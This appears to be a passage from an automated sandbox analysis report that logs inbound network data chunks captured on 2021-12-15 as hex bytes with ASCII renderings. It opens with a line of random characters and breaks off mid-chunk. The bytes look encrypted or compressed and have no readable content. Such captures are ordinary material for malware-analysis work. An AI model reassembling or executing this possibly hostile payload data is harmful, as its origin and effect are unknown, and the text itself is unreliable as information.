O904j[^sqD-_c5!HqoR8[`x2Pch{CGG~0yu0Fh2k3-A-p(KU<RWfJa}&'<\|gZh4Yb53"lY`q;#O4Hr!KW&j\Jg0sm[NW#L07ReQ:5
2021-12-15 13:13:48 UTC	102	IN	Data Raw: f7 90 61 2c 49 54 14 32 df 13 fc 72 9a 75 fa cf 7f 25 e8 43 ef 27 49 3a f6 b7 5c 44 ce 1f bf f7 cf d3 28 a0 92 c5 35 6f be f7 30 f0 c1 dd 20 34 89 0f 1d e3 21 0c d2 78 67 fd fe 5d d2 cd dd 70 c7 77 c0 d7 7a 12 4a 8d 88 ce d7 51 10 f5 ae 0f 2d c2 11 0e 83 44 21 e7 2c 90 14 da f7 56 aa 8b 2d fe b6 1e 8b 21 44 8a b0 69 32 47 f4 bd 51 87 aa c0 73 c1 7f 18 a0 04 2b 9f 6a b0 bb 1e db 0d dc f0 ac aa 1c ae ba 49 f8 e2 bb f8 8c d3 ce 1c 9d 54 4e 65 8d 05 6b 40 ec 75 8e 93 43 21 e3 cf 4a b3 5c 6f 00 c0 a9 27 60 a0 18 db 5a 82 cf ea 21 72 9c a2 ee 5a 3c fa b2 25 35 77 10 aa 68 18 ee 12 83 77 1b 7e 7e c3 54 7f f5 d4 6f 3d 8c 68 13 cd ee 54 c2 09 c2 e0 3e e7 e9 cb fa 63 d3 8b 69 df fe 28 6d 42 d8 77 42 c2 17 e7 01 c7 a2 72 1c a4 a3 09 be 84 13 36 65 81 a9 d4 97 db 6a Data Ascii: a,IT2ru%C'I:\D(5o0 4!xg]pwzJQ-D!,V-!Di2GQs+jITNek@uC!J\o'`Z!rZ<%5whw~~To=hT>ci(mBwBr6ej
2021-12-15 13:13:48 UTC	103	IN	Data Raw: ad c5 07 7e 7e 5e 46 30 51 cd 72 8d 67 b9 65 87 0d 92 12 c6 9b 35 ff fb 09 4f fc 84 d6 29 d9 54 61 34 12 99 d5 69 46 c8 a7 13 c0 d2 5f bf 20 40 47 4d 47 09 b0 4b 3b a4 10 2f 6e 8b ef 5e a9 c3 86 6b ff bf 75 89 ae c0 2b cc 8a 25 27 c0 d2 c0 e5 9b 18 97 c0 ca 5f f0 2b ae c4 c2 92 24 75 0c 7b 7d db e9 ab 75 95 6a 9a c8 df 32 f5 21 38 8b e6 c4 68 02 f8 8b 88 b4 bd ed f7 39 98 b2 4e c9 25 b4 6a 20 e1 a3 d7 45 94 9c a0 f4 d2 cd d7 7d 72 74 bd 70 06 b7 3d 05 12 66 1b 25 2b b7 a1 e3 0d bb f8 0e 92 29 36 8c 44 85 1a 4e 54 06 64 c4 f3 8f 8d cd ff 0a da b7 19 11 b4 15 9d 12 23 ef 35 4a 40 22 a1 4f 23 1e 7f 4d d0 69 28 0c 19 ad d6 f1 96 9e 67 da e6 e4 89 dd 28 9e 45 b0 97 f5 be f8 47 55 27 24 81 5f 4c c9 d6 d9 d6 81 d2 80 ef 08 c0 4d 57 f7 32 f2 22 b4 33 bd 2e 17 3d Data Ascii: ~~^F0Qrge5O)Ta4iF_ @GMGK;/n^ku+%'_+$u{}uj2!8h9N%j E}rtp=f%+)6DNTd#5J@"O#Mi(g(EGU'$_LMW2"3.=
2021-12-15 13:13:48 UTC	104	IN	Data Raw: db 6a 72 de 1a e5 7b ba 26 8d c8 d6 b3 ae 5b 40 7e e2 94 5d ff c9 53 8e a5 f3 37 19 5a bf 6f 5a c9 4e e4 1f a1 97 30 91 02 c6 96 5d 32 42 64 bf b1 db 9c dc 16 0a ad c8 53 e0 68 62 2f fa eb d6 8b 93 60 71 50 40 4e 32 f0 cb f6 36 ed be 93 a0 33 52 ea e5 eb cf c7 14 7a 48 aa 74 0f bc 4d 87 a1 32 da 91 d8 4d db ac b5 28 fc 87 38 56 a1 34 df 34 86 60 08 f6 80 02 94 1d a9 27 e8 9d ac f9 19 1e 65 20 fc e6 24 da cd 0f 0d d6 c8 0d 65 b7 8e 4a 7b d0 28 6f cd 99 3a ef 56 4a f2 90 d8 f7 a9 00 88 9c fa 34 1b 7a 8d 18 4d 30 e6 cb ea d2 14 2e 9a 5d 8e 3c 7c 39 8a 63 4c 42 4b 29 3d 02 a1 fd 7d a9 04 5f 30 9f 3f 04 fc 18 ff 5b 4a 51 d0 02 04 50 f9 36 de 6a de 66 6a 5b 36 50 6e 4c e4 98 10 b9 17 6b cb ea da 73 6d 29 5a 07 82 11 2e eb dc dc 6b 03 35 e8 6c a0 c6 e7 a5 30 d0 Data Ascii: jr{&[@~]S7ZoZN0]2BdShb/`qP@N263RzHtM2M(8V44`'e $eJ{(o:VJ4zM0.]<\|9cLBK)=}_0?[JQP6jfj[6PnLksm)Z.k5l0
2021-12-15 13:13:48 UTC	106	IN	Data Raw: 42 67 a0 ef cc 03 31 d8 d8 fb 94 2b 33 c2 8e 46 d8 ca 90 4a e7 f7 92 fc f9 df f2 24 82 1c 20 75 8d ae 0c 88 e6 90 30 3c 0c 49 0a c4 7a d3 8d d8 c7 d8 d0 7d 26 dc 74 f7 39 95 17 76 f1 fa d3 db f3 23 71 57 ef 18 6e d5 27 d6 d3 b6 a4 91 b3 7b 57 3f 1a 9f a5 7c 7a 4b 29 0c 0b a0 75 ad d7 f5 80 23 38 1a a3 14 c0 81 0b ff 5c 81 fe 4f 54 c2 79 55 98 c5 03 75 3a 6e ae 20 cb 62 1f 1c a8 e0 dd 94 1e 7b cf c3 1b 7b b0 3a ae 8e 1e a9 ca 2b ea 66 28 3d 66 72 c0 b5 a8 eb 8e 0e 2e 2e 74 d2 04 45 44 ea da 24 5d 27 8d 5b 8d e3 0e 87 83 80 9b 75 37 39 37 89 e6 56 85 01 82 7f a7 69 a6 e3 34 3b 83 1d 71 f1 be 51 3a 1b 7c 47 82 a9 32 04 cc 1b 46 7e 22 17 39 f4 56 d1 a9 73 c6 f4 71 50 08 2a aa 6a 4f 29 a9 f5 9d ad 00 1c 65 1d 65 98 ad 35 96 f4 f2 ee 6d 17 5c 50 cc 36 56 58 0f Data Ascii: Bg1+3FJ$ u0<Iz}&t9v#qWn'{W?\|zK)u#8\OTyUu:n b{{:+f(=fr..tED$]'[u797Vi4;qQ:\|G2F~"9VsqP*jO)ee5m\P6VX
2021-12-15 13:13:48 UTC	107	IN	Data Raw: b0 76 0d 89 d2 11 f0 75 98 e5 5d 9a 28 45 21 0b 7e f5 98 eb 9b 9f 7c e5 12 92 a2 b3 4f 4a 4d dc 77 df 34 fd eb fc f6 21 c5 da 7b d9 07 c1 ee a0 bf 8a 69 7d 8d 6f ff 48 fd 93 79 ec c7 86 18 e1 58 e8 cd 49 39 cb 77 5c 28 10 a1 7c 57 6a 46 b5 a3 f0 c2 8f c9 f6 61 7c 52 95 33 d2 c0 f5 40 d5 a1 15 5b d5 2f fe a5 13 7c ba 58 8f cb 81 10 72 4c 8c 07 00 ad 16 d3 40 8e 2f 8c 02 fe 51 2b b5 3e ca b3 de 0d 18 a6 30 ca 13 f4 1c aa 8b c4 eb ae 45 23 82 59 77 29 b8 7f 9f 88 dd ff 76 ce 38 29 16 e7 dc 40 74 35 1d 7e 85 b5 34 11 05 0e 75 55 c6 e5 75 a5 60 2c 12 66 f3 c7 ac 3b b0 1b 3f d2 df d8 db e6 94 a1 63 1b ae d2 c7 be f7 be 38 2c 92 04 c7 fc f4 44 f8 b3 25 9b 62 64 b0 55 1d 9d 5c 01 2b b5 de d3 fd 1b f2 bd ab 13 b0 8f 1d ac 0f a0 94 cb 69 ca d6 40 55 93 b0 7a f1 df Data Ascii: vu](E!~\|OJMw4!{i}oHyXI9w\(\|WjFa\|R3@[/\|XrL@/Q+>0E#Yw)v8)@t5~4uUu`,f;?c8,D%bdU\+i@Uz
2021-12-15 13:13:48 UTC	108	IN	Data Raw: 2e 0e d7 b4 dd c1 15 bd 2d 1c 6a 4a 7a 4e 95 71 04 42 ee d3 45 d9 58 5c 2e f7 69 2e 4f 7e 81 8d 90 a2 a0 0d 9c 8e b0 ad 86 ed 69 f9 c5 df dd fe 51 7b f9 20 5e b8 dc 6d 32 8b bd b6 e1 ec 40 91 df 85 e6 94 81 64 38 24 89 f8 ef e2 ad d0 73 7d d9 21 88 a7 95 50 5f 7f 9e 05 e8 f9 e6 59 0a 78 00 d3 cb 43 9c 1a f6 b4 9f 7e bb 2c 44 fa e7 eb 90 97 2c eb 2f cc 67 29 44 3f 56 5b 35 49 8e a8 3e 55 35 d2 a1 16 12 79 c8 b5 7a d2 49 bc b7 7e 47 32 5f a7 b4 18 d4 cb 1a 9d d0 e3 a1 23 0f d6 5d 98 ff c1 09 aa 29 be 68 16 96 d8 7e 67 a9 08 9c fa c4 1b 91 53 1f 95 ae e3 bf d7 dd 8e a8 76 5e 5c e1 74 3c e8 cf 18 a2 21 d7 71 c6 59 54 66 ce ca e6 b3 f1 2a cb 66 be a8 81 2b b0 6b 4e f8 50 af 66 36 4c 98 2f 22 68 eb d4 6d c2 ee 19 fc 7b 63 fe 69 3c fc aa 37 f6 a7 c2 b7 3c c2 d6 Data Ascii: .-jJzNqBEX\.i.O~iQ{ ^m2@d8$s}!P_YxC~,D,/g)D?V[5I>U5yzI~G2_#])h~gSv^\t<!qYTf*f+kNPf6L/"hm{ci<7<
2021-12-15 13:13:48 UTC	109	IN	Data Raw: 6b 4d 1d cb 2e ce 65 28 d2 08 f6 4e 5a 00 d3 66 b1 5d 88 1a 15 dc 48 c9 f1 84 46 23 66 a6 72 04 07 62 37 93 e5 2d a9 3e f4 5c 11 3d 3f 43 f1 67 41 bb ea b3 95 43 92 a7 f1 f2 9e 81 5c 3b 9c 13 06 32 66 17 c2 ab 18 13 6d a1 60 08 c1 59 42 b7 db f3 2f de 7a 04 1d 24 19 3d c3 92 e0 ba 41 51 1a ae 3c f3 93 5d fb 7c c8 cd 2d c8 21 86 c0 cb 68 77 4f 38 eb 0b a9 80 21 57 da 61 48 f1 89 34 58 8a a8 71 5f e7 92 d8 03 5d 77 64 18 8a 73 1b 21 06 c0 dd 2b 5b b6 1e de 11 06 3e e8 35 11 e2 2f 5e 7c e0 ac 81 d3 8e 0d 5b 14 fd ca 3e 4d 46 e0 8e a8 4d 98 7a 96 47 6a db 3b 38 79 16 a9 4b 39 29 d7 af 82 3e 07 ca d6 d1 2d c0 5c e3 6c 51 79 bb 6b 99 41 eb 46 72 62 a0 34 ff 45 c1 90 3b 10 71 1d 1a af 35 3c 6b 0d 05 96 2d 43 5f c2 7d 90 83 16 9e 3b 40 be e0 aa 98 23 c7 31 1d dc Data Ascii: kM.e(NZf]HF#frb7->\=?CgAC\;2fm`YB/z$=AQ<]\|-!hwO8!WaH4Xq_]wds!+[>5/^\|[>MFMzGj;8yK9)>-\lQykAFrb4E;q5<k-C_};@#1
2021-12-15 13:13:48 UTC	111	IN	Data Raw: 73 7d 01 3a 94 5e 0d a9 ae f9 1b 61 2d 2c 55 ed c0 bf e0 09 21 13 6a 75 17 f3 c5 1d 03 7e 0b 2c 4e d3 c9 42 f5 7d 7c a3 d4 16 92 2c 12 de 87 56 b4 d8 20 1f 03 c2 57 32 52 02 57 e6 d1 0a 8b 41 7d 59 a8 73 af 63 87 7b 11 9e 84 b1 42 e8 c8 31 6d a2 ae 60 df 5c 9b 10 74 de 66 44 86 b3 5e f3 71 d5 9c c8 e8 9b 56 b6 26 35 cd 93 e5 85 ac fa d2 0b ff e7 09 71 77 9b 9a f1 43 a2 17 6a 3b 4c 4a 17 4f 1e 94 fe 45 a6 db 14 94 16 4a 7a d1 57 48 ea 86 8f 4c dd b8 89 da 72 ce ea 62 2e 94 38 c5 18 24 22 ca c5 c0 87 ec b8 66 26 36 7e 4b 24 e9 1e 2d f7 cb 76 ba 2b 92 67 d8 0a b0 f4 31 9f da 5a 46 5b d4 ae 5a 83 18 13 e8 ac 00 9f c1 14 dd a5 14 9d 83 19 e8 eb 22 8c 22 ee 74 22 d5 c3 31 82 c8 0f c8 97 9c 4e a9 9f 47 78 68 da 29 d5 5e 61 de d1 60 1d 73 c4 68 af a5 a9 0f eb 52 Data Ascii: s}:^a-,U!ju~,NB}\|,V W2RWA}Ysc{B1m`\tfD^qV&5qwCj;LJOEJzWHLrb.8$"f&6~K$-v+g1ZF[Z""t"1NGxh)^a`shR
2021-12-15 13:13:48 UTC	112	IN	Data Raw: 71 17 f3 97 2e 00 a1 28 bf 12 92 07 87 d7 85 21 75 75 a7 98 81 6a 91 8a 46 87 71 ef ea 26 b8 0b 4e b0 52 d3 d9 58 f1 95 11 40 80 4f b7 1f 33 98 d0 f8 75 06 f6 3e c8 6b 67 8d ca ee 60 8c 30 1e 2b 16 88 f3 80 0d 63 bd c3 ec b2 43 61 77 52 33 df 82 51 dc e1 c7 f0 be d1 39 fc 14 11 62 24 86 82 b5 fd 13 89 3b ab 6b 3e e4 62 a1 c9 8b 05 18 94 49 b9 40 a1 24 7f bb 4d 87 75 3a 0d 86 ce c8 9e b4 32 47 69 10 17 d5 b7 37 fa ad df 63 59 b0 09 45 d9 09 84 d8 4c b8 a6 98 af 78 18 4c 4c a3 58 42 03 97 3b c8 c8 2e f6 cb 14 3c 22 03 ab 3f 9a 12 df e4 c5 89 05 c0 51 b2 de ea 98 17 bf 38 e4 6f 85 99 51 34 3b 38 3c df 18 05 eb a4 a3 1e f7 68 74 da 60 15 9b 90 4a 32 e0 da 13 1a d1 29 f8 4f fc ed f7 b1 a2 54 7f e0 ac 0b 04 0b 24 83 6b cf ea a6 31 5b 86 01 26 dd f7 c7 c9 2a ea Data Ascii: q.(!uujFq&NRX@O3u>kg`0+cCawR3Q9b$;k>bI@$Mu:2Gi7cYELxLLXB;.<"?Q8oQ4;8<ht`J2)OT$k1[&*
2021-12-15 13:13:48 UTC	113	IN	Data Raw: 59 52 8c 4f d9 fd 19 5d cd a2 3b b8 42 43 4f 51 a2 7b 65 cd 5c 48 0c d9 17 e9 92 63 d3 14 a2 38 a0 09 be fa 41 76 23 85 df d9 c0 41 2f 85 e7 27 1f 12 8d 24 78 1c c9 33 e5 e8 30 5d c8 d5 5e 05 ed 10 94 da b7 cb 0e bd 59 75 9f 0b 1d ea 9b cf 00 dd b6 b8 f4 21 77 14 a2 69 f0 a3 6b 26 5b e8 68 8c cf 22 58 33 e6 56 88 db 59 52 ea e3 22 76 3b cf be d7 fb d7 e7 59 78 8f 16 25 4b 22 76 4e 38 14 f4 8a a8 3e 06 26 2e 09 0a ff 9b 45 1c 77 e6 a3 a8 dc 2f ae 29 e4 ed b5 69 b8 9d ca ac 3c e4 2c f1 b2 e1 49 98 17 4d 5f de d1 4d 03 0d 6d 37 00 d1 2d 71 9c ac 41 40 02 0c 4e b8 9c 34 af 3c 8f 9a 95 ce af 66 38 fc 32 d1 ea dd 38 f2 d8 0c f6 24 23 a5 92 0d 6d b2 c4 d1 1f 26 f0 0d 4d 06 0d 23 16 0f 54 2b e4 59 6d 3a 57 be 2a b0 e3 90 44 b8 40 9d 4b bc fe 85 f9 a0 06 2f 46 8a Data Ascii: YRO];BCOQ{e\Hc8Av#A/'$x30]^Yu!wik&[h"X3VYR"v;Yx%K"vN8>&.Ew/)i<,IM_Mm7-qA@N4<f828$#m&M#T+Ym:W*D@K/F
2021-12-15 13:13:48 UTC	114	IN	Data Raw: d7 24 1c 6c e9 3d 11 57 fc 27 10 51 74 37 98 61 1f ca 82 32 89 fd 02 65 c7 61 a1 1c 12 ed df 5f e3 34 88 b6 32 d5 99 b0 8e e4 0f dc 58 56 01 99 bd d0 5e 17 39 e8 e3 a0 07 43 59 f8 bb 79 76 24 ec 50 b2 de 09 7d dd c6 40 78 ab e1 1f 36 61 d9 85 80 d2 24 c2 f8 3b a7 77 1c e3 58 40 50 62 ea b3 ea 11 8c 65 01 ee ec 3a 12 1f 42 37 cb 34 01 1d 6e a2 19 46 9d 40 eb 13 04 2b 8e 33 67 7d ad 67 99 f4 17 20 75 6f cb 74 d9 57 0d 2a 71 da 86 df b2 9b f7 59 75 a9 39 da 87 9c 60 7f ee e2 22 9f 7a b3 a4 23 b7 9d 96 aa c1 43 de 06 22 b8 30 4d 12 8d 82 bd 4d 37 1c 6a 4e 60 31 c5 8f 16 95 3b 2d 53 d4 3b 81 39 29 63 25 18 26 fe f4 f2 55 c3 1b 28 e6 d3 96 8f 1d 57 38 25 dc ec d2 81 37 aa e2 82 ac 2e 70 f2 2f 51 e9 7e 66 f9 bf e8 be a8 e6 1c f5 61 90 66 68 b3 3d 35 27 01 48 ba Data Ascii: $l=W'Qt7a2ea_42XV^9CYyv$P}@x6a$;wX@Pbe:B74nF@+3g}g uotW*qYu9`"z#C"0MM7jN`1;-S;9)c%&U(W8%7.p/Q~fafh=5'H
2021-12-15 13:13:48 UTC	115	IN	Data Raw: 49 d5 13 1d ff f9 74 0f a3 ae c5 85 99 5f f2 57 09 c6 4b 16 bd d4 02 1b 21 37 e9 49 44 26 b8 30 5c 54 dd eb 6d 53 87 ed 8f 8d a0 d7 a0 5e ea 48 9b 60 94 2b 8d 3c 55 67 e0 b7 b6 d9 53 bc e0 35 22 38 b7 17 6b 8b e3 46 6f 72 77 8e de 1a 0c b4 33 1b a3 8a 70 0a 48 ed ce c4 56 bd 71 94 9b 01 51 dd e5 ea ab 4d f6 41 19 c0 cf a0 46 0d 72 bc 19 1e 26 44 4f 89 af bd ce 37 2a 0e 73 75 85 54 6b 81 0e c2 9d fa 05 cb 69 d4 9c 93 68 de c4 1d 60 75 a5 78 64 2b f3 10 aa c3 76 49 01 1b ad 3c fd 64 65 51 69 0c 01 89 74 39 6e 7e 6f cd f0 ca 28 19 f8 b2 af 2c 9b 23 04 09 cb 9a 06 fc 7d 22 a3 9b 26 d9 4d a4 6e 8b 4b 89 fd 3f 55 9c 80 6e 67 59 a5 3d 15 ff e0 c8 9f 38 25 cd 1e d7 01 9d 13 5a 86 7c cf 8f 26 ab ed 69 32 a8 93 17 4b bf e1 67 c1 c3 40 19 a1 cd b8 f6 b0 fe 3d 97 86 Data Ascii: It_WK!7ID&0\TmS^H`+<UgS5"8kForw3pHVqQMAFr&DO7*suTkih`uxd+vI<deQit9n~o(,#}"&MnK?UngY=8%Z\|&i2Kg@=
2021-12-15 13:13:48 UTC	117	IN	Data Raw: dd 8b 83 9f 68 30 ee b7 4a dc 87 5d f5 87 5d a5 cc ad f7 d5 ca ac 6f 9a ee 9e 39 af 7f 67 94 17 e0 8b b7 e3 56 b6 c9 9c 27 97 6b b5 60 be 2b 81 d8 d3 9b f3 18 3b 70 23 ad 0b ae 1e 8d 71 b9 28 7c c4 68 e8 18 a5 f7 42 69 79 32 89 92 7b 6e 38 18 12 99 19 16 e2 a8 79 d7 8c 00 7e 76 ff 43 b1 ae ce fb 86 b4 c6 52 4d 26 0e cb 9e 80 f8 70 86 a5 7b 59 85 35 b6 36 fc 03 ca 2e 8f 0d e3 82 f4 7d 32 fc 44 cb f8 ae e1 ec 9f 7f b9 1d 52 e5 81 21 00 7c 0b a8 19 42 56 1f c3 04 e0 5e 6c 17 32 75 b5 f2 85 9d 6d f4 d0 de a1 ba 43 5e ac 53 68 9a 0f f7 41 0d c2 2b 9b 38 44 d3 eb 82 af 95 e2 84 8d ba e7 6c 8d 76 59 ec 02 08 d3 9f f4 f7 8f 5b 86 d7 94 20 5e 2f 3f 06 8a d3 25 65 7a 03 18 c5 d5 3d c5 f5 82 c5 ea 18 43 37 9f 74 b4 ea 93 3f 7f fa d1 18 56 cd f4 35 bc 95 12 b0 ba 6d Data Ascii: h0J]]o9gV'k`+;p#q(\|hBiy2{n8y~vCRM&p{Y56.}2DR!\|BV^l2umC^ShA+8DlvY[ ^/?%ez=C7t?V5m
2021-12-15 13:13:48 UTC	118	IN	Data Raw: 72 9b 4a f0 55 a4 a4 ce 4a 1c 40 3a 48 23 58 27 e7 df 97 69 7d ea 4f a5 07 55 a5 69 d8 10 dd 94 45 a0 0e 0b 83 fd c3 79 51 c1 59 f7 11 d3 db e1 0f 68 24 2b 33 1b d4 14 ed b1 51 83 65 05 41 7d a8 bb c6 9c 63 68 a7 64 b9 30 86 a2 cb 4a 4e 34 8d 1f b3 44 a3 03 a9 23 a3 61 c3 6d 58 4f cc f7 3d 32 45 fa 23 85 df aa 0a 38 0d 6d 5d b8 e2 70 50 eb 3d e7 8b 71 75 3e e0 17 8d 4f fb 41 0b 23 90 49 5a d9 c5 6b 03 3e 2b 34 67 09 68 05 16 c3 42 cf 4f 26 df 30 c6 79 cf 8b 89 cf d7 9a 71 4f bc 82 a8 5c 1e b2 38 e3 c5 67 63 27 61 61 fa 29 65 91 b8 3c ee 26 b1 06 b8 82 bf 86 ec bf dd 29 97 c5 2d 41 b0 24 7e e2 ce e7 e0 49 29 df 38 ad 22 6e c6 a9 29 d8 73 86 b0 46 65 42 77 d6 3a 1f 57 25 d4 b7 28 8c 65 18 a4 97 28 e0 e3 59 88 85 14 28 7c 2f 54 6a 32 d8 18 70 6d c9 44 a1 9e Data Ascii: rJUJ@:H#X'i}OUiEyQYh$+3QeA}chd0JN4D#amXO=2E#8m]pP=qu>OA#IZk>+4ghBO&0yqO\8gc'aa)e<&)-A$~I)8"n)sFeBw:W%(e(Y(\|/Tj2pmD
2021-12-15 13:13:49 UTC	119	IN	Data Raw: d0 f9 7b 85 1b aa 9d 49 0f 0e f7 52 77 a0 9e 79 f9 b7 ba 8a d3 c9 45 fe 2f 6c 03 70 87 f6 45 ae 3f fa e6 d8 59 2b 80 05 8b b7 e0 2a 26 b6 ee 52 dd 3c 29 fd a5 6c c2 30 47 e0 4f a1 b2 4b ae 29 ae b0 22 d9 ca 9d 2b d7 57 b7 37 a7 95 62 e8 f0 59 d4 52 29 a1 05 c1 b3 a0 48 d5 5d 82 bb 91 79 db 3d 44 2e 5a e8 e8 f4 4b 71 a5 63 7c d5 0d 32 f5 d5 5e 6f 56 6c 98 cc a0 0f 9b 70 3a 0c 26 86 f7 21 69 47 72 41 4f e2 8b 96 96 54 92 96 14 4f da 95 7f 25 31 7b fb 04 53 b8 c3 f7 1f c2 85 5f ad f5 e7 9b 13 a1 eb 7b 9a 77 e5 25 0c 21 5d 14 15 d8 ff d0 ed 3a b2 f3 3c b3 a6 c7 5e fe 4d 87 b8 00 d1 be 06 17 df 09 ce 4c a1 c4 b4 e9 c7 16 d1 fb 9d c2 ff 51 51 23 1d 42 0e e5 a9 1a 40 29 3a e7 01 71 9c a4 53 80 37 a3 3b 82 59 de fc 2c 61 8f 1a 73 9b 7b 36 c8 6f 06 66 6f 28 20 fe Data Ascii: {IRwyE/lpE?Y+*&R<)l0GOK)"+W7bYR)H]y=D.ZKqc\|2^oVlp:&!iGrAOTO%1{S_{w%!]:<^MLQQ#B@):qS7;Y,as{6ofo(
2021-12-15 13:13:49 UTC	120	IN	Data Raw: 25 67 cd c3 45 19 a3 ce fe 0e 35 bc 45 2f 3e 4a 9e dd cd 5a 8b 03 bf c0 bd 65 d0 79 c3 c4 75 36 a5 9a 0b 83 58 ea 11 48 46 1f b8 2f 1f 3e 79 95 b1 e2 24 9b a5 12 63 2f 30 bc 23 84 45 19 a5 d5 83 03 f5 2c 5b 71 bb bd a7 a9 ef 4c 75 2f 2e e4 25 6f e7 82 42 b9 64 3d e2 3d c8 65 cf 69 9e b8 c2 87 d4 d3 44 9c 76 28 ed 45 60 f2 bf e7 e9 54 de 76 01 d2 7d 1a a1 3e f9 b9 f0 27 d4 03 ad 72 cc b7 06 f6 ae 2c 6d 60 02 1f 0a 82 0e 1a 42 00 b9 9d 42 49 66 e1 68 79 71 fa af 21 cc 36 1c 8a 07 d2 ea 2b 81 02 34 2b b8 ef ff 42 09 f6 2c c9 ef 54 da 35 fe 6c b2 13 87 4d ce ee 35 bc ad 9d 87 6b 55 4c 51 ea 38 e5 1f a4 14 82 f7 36 ae cf 31 1c 4d 1d a4 8b 29 da bc 0a f6 73 08 cf 50 d7 ea cc ce e4 cb ed c4 eb 74 9c 6f 1e 72 50 db e7 7e 27 d0 02 e6 4c a8 a6 9c 9d 72 5c 57 94 81 Data Ascii: %gE5E/>JZeyu6XHF/>y$c/0#E,[qLu/.%oBd==eiDv(E`Tv}>'r,m`BBIfhyq!6+4+B,T5lM5kULQ861M)sPtorP~'Lr\W
2021-12-15 13:13:49 UTC	122	IN	Data Raw: 77 2a fa 2d 52 97 23 cb 53 e6 30 8c 10 41 52 71 e4 d5 f3 c2 6f 99 93 8f ae 7c 82 07 25 19 e8 d3 8e 17 4a 12 bf 2f ff 20 74 c0 4f 2f 72 5e 4b 68 79 3d e1 e6 b7 57 aa 74 75 b4 87 b8 3b a1 48 65 65 e9 fa c0 d6 fd 4e 6e 84 60 1b bd 7f 12 f4 29 b0 b7 50 bb 52 23 58 ca 82 9f 28 7a d7 cf 5a 20 2a 93 39 be a9 73 95 d4 14 4c 85 0b 2b 87 37 06 1e 51 b9 c8 b9 27 49 54 1a a1 62 6c 01 b3 97 04 a1 7e 73 f8 3c e5 b2 a0 90 95 24 e6 e2 3f b0 a0 3c c1 b3 37 dc 76 9e c2 df 76 db f2 d8 8b 03 2e 6d ba 53 f2 17 ed 14 c1 1f 89 af 0c 8a bf f0 6d 21 fb 26 47 c3 3a ff 07 2a 06 c7 d4 88 78 3d 18 c3 b6 02 ad 20 37 0f 0c 17 c0 5b ee 49 15 ab 8a a2 26 a6 d2 97 76 35 ad 14 8c ed 6a 59 fb 5a 67 53 9e 7a 33 fa e7 15 fd a7 b3 6c 52 7b b0 3e 98 5a 24 97 81 9b 04 24 ff a2 a6 b1 b7 21 95 f1 Data Ascii: w-R#S0ARqo\|%J/ tO/r^Khy=Wtu;HeeNn`)PR#X(zZ 9sL+7Q'ITbl~s<$?<7vv.mSm!&G:*x= 7[I&v5jYZgSz3lR{>Z$$!
2021-12-15 13:13:49 UTC	123	IN	Data Raw: 37 9a f5 3b 49 d6 75 af 8d 57 9d dd 22 81 07 64 1b 3c 97 b6 20 8b ef 2e e3 cb 4b 7b ab cb d4 1a 22 0a 61 65 92 1e 85 36 da f4 77 bc 4e be d8 6b 7b 4a 69 5f 30 9c 76 51 1e d1 4f a2 52 6f fc 86 ec 33 e1 3c e0 b0 81 a2 02 9b ff 14 63 5e c8 74 f1 f7 f4 3a f2 11 98 57 2e be 57 30 b8 85 d5 bd e3 53 6f 4e 4e 61 5d de 00 df 22 94 6b 56 f1 ae d4 5b 45 21 0b 7e 26 16 7b 98 52 00 e6 ef 35 43 19 bc da 28 99 93 8f 65 2c 7d 71 96 ff 41 52 92 70 a0 ce 9a 2e a3 8b 34 85 04 33 85 23 b6 5c 72 a0 22 2a bf ee 9c 56 c9 3b f5 9d 9f 02 44 87 d6 77 1b e6 26 db 5d 8a fd 38 3c a0 89 9a ae 32 0f 39 8c 79 41 1b 68 bb 79 5f dd b6 1b 07 4d 2c e8 d3 08 e9 5e bc ed 05 65 6b 43 62 62 97 36 7e 64 30 00 f6 17 56 e0 56 69 00 0c 01 bf 30 ca 5b 5a 18 99 cd d0 3e e3 89 a0 0a d1 97 30 8c 9d 60 Data Ascii: 7;IuW"d< .K{"ae6wNk{Ji_0vQORo3<c^t:W.W0SoNNa]"kV[E!~&{R5C(e,}qARp.43#\r"*V;Dw&]8<29yAhy_M,^ekCbb6~d0VVi0[Z>0`
2021-12-15 13:13:49 UTC	124	IN	Data Raw: d4 26 62 f1 04 bc fa 8e 33 0c 91 69 0f 64 ff e2 bc 6b 3e f3 99 aa be d4 8a 44 43 fa 65 eb 83 25 09 fc a3 63 6f e1 6d a3 7e b8 b8 f8 26 f9 f3 8f 1d 95 bb 28 07 4c b0 b9 f6 a3 2f 0e 86 65 c0 17 fb be 70 c7 d0 4d 41 30 cc 56 a4 f7 01 89 9c 0e 85 f1 97 f3 ef f4 92 e2 e6 97 b2 99 79 1f cf d7 d6 62 87 83 6c 45 f1 79 22 9c da 39 ed 8a a9 18 3b 96 ad 04 fe cf 77 33 73 ff 06 cc a8 ef 20 1e 7d 9d d7 d4 19 f9 da 35 65 a6 07 8c 85 73 ac bb a3 28 61 3b 01 8e 75 5d 9d 2d 65 0e 48 55 33 6e c7 02 3d 71 a4 8c 66 18 71 36 3d 37 ce f5 6d 7c 3e 49 09 91 28 06 87 db ea 7c c0 17 c4 51 f6 e9 eb c5 1a 4b 76 bf 77 9a 61 a0 45 7d 63 56 d6 f6 18 08 bf d7 62 2e cc 6e aa 8f e0 06 e3 7d 21 a6 ad f1 1e 5f 99 a3 0b e8 f1 38 24 12 b1 17 ae db 65 9f 2d 46 4f 03 62 6a 83 e4 91 6e a7 b8 1e Data Ascii: &b3idk>DCe%com~&(L/epMA0VyblEy"9;w3s }5es(a;u]-eHU3n=qfq6=7m\|>I(\|QKvwaE}cVb.n}!_8$e-FObjn
2021-12-15 13:13:49 UTC	125	IN	Data Raw: 56 13 76 b3 a0 ff 50 ce ec 7a 19 c8 15 d0 3b 4a 21 36 85 68 82 70 bc 95 17 1f 10 b6 1c 94 f3 1d 83 8e 87 e0 ab 99 82 72 1d e9 33 c3 81 34 5a be 58 5b ac 3f 99 c1 dd 0a 4d 02 bb 12 17 9f cb 92 a2 a2 85 0e 80 69 c0 fb 33 5b ad 90 0e 18 7d 2f 3d ef 34 9f 1f 03 77 c4 da b2 9c 06 3e 16 18 a3 81 13 e3 e6 14 ea 72 95 3d 2a a7 57 a2 99 99 25 48 da f2 f3 4b 8c 42 4c 86 4f 22 32 37 f7 20 b3 1c f8 4c af 59 da e4 ae 76 6c fe 56 fb cc 73 0e 2e ae ff 12 eb b3 b4 15 45 9d 60 cf ec 10 33 76 f8 a7 ac 39 61 50 bd 9e 35 19 77 64 0d 45 f0 b1 ae 28 f0 b2 55 e7 fe ac bb 69 51 ab b5 a3 eb b2 06 58 b2 1d 24 27 52 5b 62 54 df 87 b8 5e 6d 5c 52 bd 36 e1 0c 6e 3a 05 b0 